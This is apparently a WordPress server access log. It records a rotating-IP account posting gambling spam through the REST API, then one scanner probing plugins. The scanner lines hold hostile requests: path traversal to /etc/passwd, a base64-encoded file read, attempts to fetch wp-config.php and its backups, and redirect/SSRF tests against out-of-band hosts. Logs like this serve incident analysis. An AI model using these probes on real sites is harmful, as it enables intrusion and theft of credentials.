107.158.18.79 - wordpress_3481f57911c4 [30/Jul/2026:16:25:37 +0000] "GET /wp-json/wp/v2/posts?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20256 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.79 - wordpress_3481f57911c4 [30/Jul/2026:16:25:38 +0000] "GET /wp-json/wp/v2/posts?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 396877 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
172.70.248.48 - - [30/Jul/2026:16:25:39 +0000] "GET /wp-admin/install.php?step=1 HTTP/1.1" 200 811 "-" "http://moonbloomwalls.com/wp-admin/install.php?step=1"
107.158.18.79 - wordpress_3481f57911c4 [30/Jul/2026:16:25:40 +0000] "POST /wp-json/wp/v2/posts HTTP/1.1" 201 23811 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
85.155.190.233 - - [30/Jul/2026:16:25:40 +0000] "POST /wp-cron.php?doing_wp_cron=1785428740.3710939884185791015625 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
107.158.18.79 - - [30/Jul/2026:16:25:41 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.79 - wordpress_3481f57911c4 [30/Jul/2026:16:25:41 +0000] "GET /wp-json/wp/v2/pages?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.79 - wordpress_3481f57911c4 [30/Jul/2026:16:25:42 +0000] "GET /wp-json/wp/v2/pages?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 396825 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.79 - wordpress_3481f57911c4 [30/Jul/2026:16:25:44 +0000] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 23278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.79 - - [30/Jul/2026:16:25:45 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.63 - wordpress_3481f57911c4 [30/Jul/2026:16:25:46 +0000] "GET /wp-json/wp/v2/posts?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.63 - wordpress_3481f57911c4 [30/Jul/2026:16:25:47 +0000] "GET /wp-json/wp/v2/posts?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 416692 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.63 - wordpress_3481f57911c4 [30/Jul/2026:16:25:48 +0000] "POST /wp-json/wp/v2/posts HTTP/1.1" 201 23811 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
85.155.190.233 - - [30/Jul/2026:16:25:48 +0000] "POST /wp-cron.php?doing_wp_cron=1785428748.6468050479888916015625 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
107.158.18.63 - - [30/Jul/2026:16:25:49 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.63 - wordpress_3481f57911c4 [30/Jul/2026:16:25:50 +0000] "GET /wp-json/wp/v2/pages?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.63 - wordpress_3481f57911c4 [30/Jul/2026:16:25:51 +0000] "GET /wp-json/wp/v2/pages?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 416649 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.63 - wordpress_3481f57911c4 [30/Jul/2026:16:25:52 +0000] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 23278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.63 - - [30/Jul/2026:16:25:53 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
154.62.174.39 - wordpress_3481f57911c4 [30/Jul/2026:16:25:53 +0000] "GET /wp-json/wp/v2/posts?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20256 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
154.62.174.39 - wordpress_3481f57911c4 [30/Jul/2026:16:25:54 +0000] "GET /wp-json/wp/v2/posts?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 436703 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
154.62.174.39 - wordpress_3481f57911c4 [30/Jul/2026:16:25:54 +0000] "POST /wp-json/wp/v2/posts HTTP/1.1" 201 23811 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
85.155.190.233 - - [30/Jul/2026:16:25:54 +0000] "POST /wp-cron.php?doing_wp_cron=1785428754.9875290393829345703125 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
154.62.174.39 - - [30/Jul/2026:16:25:55 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
154.62.174.39 - wordpress_3481f57911c4 [30/Jul/2026:16:25:55 +0000] "GET /wp-json/wp/v2/pages?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
154.62.174.39 - wordpress_3481f57911c4 [30/Jul/2026:16:25:56 +0000] "GET /wp-json/wp/v2/pages?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 436451 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
154.62.174.39 - wordpress_3481f57911c4 [30/Jul/2026:16:25:56 +0000] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 23278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
154.62.174.39 - - [30/Jul/2026:16:25:56 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.109.193.102 - wordpress_3481f57911c4 [30/Jul/2026:16:25:58 +0000] "GET /wp-json/wp/v2/posts?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20256 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.109.193.102 - wordpress_3481f57911c4 [30/Jul/2026:16:25:59 +0000] "GET /wp-json/wp/v2/posts?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 456328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.109.193.102 - wordpress_3481f57911c4 [30/Jul/2026:16:26:01 +0000] "POST /wp-json/wp/v2/posts HTTP/1.1" 201 23788 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
85.155.190.233 - - [30/Jul/2026:16:26:01 +0000] "POST /wp-cron.php?doing_wp_cron=1785428761.3884429931640625000000 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
38.109.193.102 - - [30/Jul/2026:16:26:02 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.109.193.102 - wordpress_3481f57911c4 [30/Jul/2026:16:26:03 +0000] "GET /wp-json/wp/v2/pages?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
85.155.190.233 - - [30/Jul/2026:16:26:03 +0000] "POST /wp-cron.php?doing_wp_cron=1785428763.3313980102539062500000 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
38.109.193.102 - wordpress_3481f57911c4 [30/Jul/2026:16:26:04 +0000] "GET /wp-json/wp/v2/pages?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 456291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.109.193.102 - wordpress_3481f57911c4 [30/Jul/2026:16:26:05 +0000] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 23255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.109.193.102 - - [30/Jul/2026:16:26:06 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
77.90.154.117 - wordpress_3481f57911c4 [30/Jul/2026:16:26:07 +0000] "GET /wp-json/wp/v2/posts?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20256 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
77.90.154.117 - wordpress_3481f57911c4 [30/Jul/2026:16:26:07 +0000] "GET /wp-json/wp/v2/posts?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 476331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
77.90.154.117 - wordpress_3481f57911c4 [30/Jul/2026:16:26:08 +0000] "POST /wp-json/wp/v2/posts HTTP/1.1" 201 23811 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
85.155.190.233 - - [30/Jul/2026:16:26:08 +0000] "POST /wp-cron.php?doing_wp_cron=1785428768.4794518947601318359375 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
77.90.154.117 - - [30/Jul/2026:16:26:08 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
77.90.154.117 - wordpress_3481f57911c4 [30/Jul/2026:16:26:09 +0000] "GET /wp-json/wp/v2/pages?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
77.90.154.117 - wordpress_3481f57911c4 [30/Jul/2026:16:26:09 +0000] "GET /wp-json/wp/v2/pages?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 476122 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
77.90.154.117 - wordpress_3481f57911c4 [30/Jul/2026:16:26:10 +0000] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 23255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
77.90.154.117 - - [30/Jul/2026:16:26:10 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.58 - wordpress_3481f57911c4 [30/Jul/2026:16:26:11 +0000] "GET /wp-json/wp/v2/posts?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.58 - wordpress_3481f57911c4 [30/Jul/2026:16:26:12 +0000] "GET /wp-json/wp/v2/posts?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 495964 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.58 - wordpress_3481f57911c4 [30/Jul/2026:16:26:14 +0000] "POST /wp-json/wp/v2/posts HTTP/1.1" 201 23811 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
85.155.190.233 - - [30/Jul/2026:16:26:14 +0000] "POST /wp-cron.php?doing_wp_cron=1785428774.1690239906311035156250 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
107.158.18.58 - - [30/Jul/2026:16:26:14 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.58 - wordpress_3481f57911c4 [30/Jul/2026:16:26:15 +0000] "GET /wp-json/wp/v2/pages?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.58 - wordpress_3481f57911c4 [30/Jul/2026:16:26:16 +0000] "GET /wp-json/wp/v2/pages?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 495922 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.58 - wordpress_3481f57911c4 [30/Jul/2026:16:26:18 +0000] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 23278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
107.158.18.58 - - [30/Jul/2026:16:26:18 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
147.182.222.217 - - [30/Jul/2026:16:26:20 +0000] "GET /wp-admin/profile.php HTTP/1.1" 302 432 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
38.75.196.200 - wordpress_3481f57911c4 [30/Jul/2026:16:26:20 +0000] "GET /wp-json/wp/v2/posts?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20256 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.75.196.200 - wordpress_3481f57911c4 [30/Jul/2026:16:26:21 +0000] "GET /wp-json/wp/v2/posts?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 515779 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.75.196.200 - wordpress_3481f57911c4 [30/Jul/2026:16:26:23 +0000] "POST /wp-json/wp/v2/posts HTTP/1.1" 201 23811 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
85.155.190.233 - - [30/Jul/2026:16:26:23 +0000] "POST /wp-cron.php?doing_wp_cron=1785428783.5651550292968750000000 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
38.75.196.200 - - [30/Jul/2026:16:26:24 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.75.196.200 - wordpress_3481f57911c4 [30/Jul/2026:16:26:25 +0000] "GET /wp-json/wp/v2/pages?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.75.196.200 - wordpress_3481f57911c4 [30/Jul/2026:16:26:26 +0000] "GET /wp-json/wp/v2/pages?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 515753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.75.196.200 - wordpress_3481f57911c4 [30/Jul/2026:16:26:27 +0000] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 23278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
38.75.196.200 - - [30/Jul/2026:16:26:28 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
94.154.32.51 - - [30/Jul/2026:16:26:34 +0000] "POST /wp-json/batch/v1 HTTP/1.1" 207 439 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
94.154.32.51 - - [30/Jul/2026:16:26:34 +0000] "POST /wp-json/batch/v1 HTTP/1.1" 207 439 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
94.154.32.51 - - [30/Jul/2026:16:26:34 +0000] "POST /wp-json/batch/v1 HTTP/1.1" 207 1042 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
94.154.32.51 - - [30/Jul/2026:16:26:35 +0000] "POST /wp-json/batch/v1 HTTP/1.1" 207 129945 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:26:50 +0000] "GET /wp-admin/users.php?role=administrator HTTP/1.1" 302 432 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
85.155.190.233 - - [30/Jul/2026:16:27:07 +0000] "POST /wp-cron.php?doing_wp_cron=1785428827.5515151023864746093750 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
206.206.91.82 - wordpress_3481f57911c4 [30/Jul/2026:16:27:07 +0000] "GET /wp-json/wp/v2/pages?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 535215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
206.206.91.82 - wordpress_3481f57911c4 [30/Jul/2026:16:27:14 +0000] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 23278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
43.156.232.154 - - [30/Jul/2026:16:27:15 +0000] "GET /2026/07/30/mostbet-az-bukmeker-ve-kazino-mostbet-giris-r-smi-sayt-16/ HTTP/1.1" 200 27681 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
206.206.91.82 - - [30/Jul/2026:16:27:19 +0000] "POST /xmlrpc.php HTTP/1.1" 403 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
204.77.129.42 - wordpress_3481f57911c4 [30/Jul/2026:16:27:21 +0000] "GET /wp-json/wp/v2/posts?context=edit&slug=onlyspins-deutschland-schritt-fur-schritt-anleitung-zu-registrierung-bonus-auszahlung&per_page=5&_fields=id,link,slug,status,content HTTP/1.1" 200 20256 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
204.77.129.42 - wordpress_3481f57911c4 [30/Jul/2026:16:27:22 +0000] "GET /wp-json/wp/v2/posts?context=edit&search=https%3A%2F%2Fonly-spins-deutschland.com%2Fapp&per_page=50&_fields=id,link,slug,status,content HTTP/1.1" 200 535614 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0"
147.182.222.217 - - [30/Jul/2026:16:27:35 +0000] "GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
147.182.222.217 - - [30/Jul/2026:16:27:36 +0000] "GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.25"
147.182.222.217 - - [30/Jul/2026:16:27:36 +0000] "GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 118 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
147.182.222.217 - - [30/Jul/2026:16:27:41 +0000] "GET /?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image HTTP/1.1" 301 423 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:27:42 +0000] "GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.29 (KHTML, like Gecko) Version/17.7 Safari/617.29"
147.182.222.217 - - [30/Jul/2026:16:27:51 +0000] "GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:27:53 +0000] "GET /wp-content/plugins/simple-ajax-chat/sac-export.csv HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
147.182.222.217 - - [30/Jul/2026:16:27:54 +0000] "GET /wp-content/uploads/database-backups/ HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/618.31.14 (KHTML, like Gecko) Version/17.7 Safari/618.31.14"
147.182.222.217 - - [30/Jul/2026:16:27:54 +0000] "GET /wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== HTTP/1.1" 400 433 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:27:57 +0000] "GET /wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me HTTP/1.1" 302 432 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19"
147.182.222.217 - - [30/Jul/2026:16:27:59 +0000] "GET /wp-content/ldap-authentication-report.csv HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:39 +0000] "POST /wp-content/plugins/gallery-plugin/upload/php.php HTTP/1.1" 404 181 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:39 +0000] "POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (SS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0"
147.182.222.217 - - [30/Jul/2026:16:29:40 +0000] "GET /wp-config.php HTTP/1.1" 403 180 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php~ HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.12 (KHTML, like Gecko) Version/17.3 Safari/617.12"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config-sample.php HTTP/1.1" 500 2499 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.inc HTTP/1.1" 301 423 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.swp HTTP/1.1" 301 423 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.txt HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.SAVE HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.bak HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
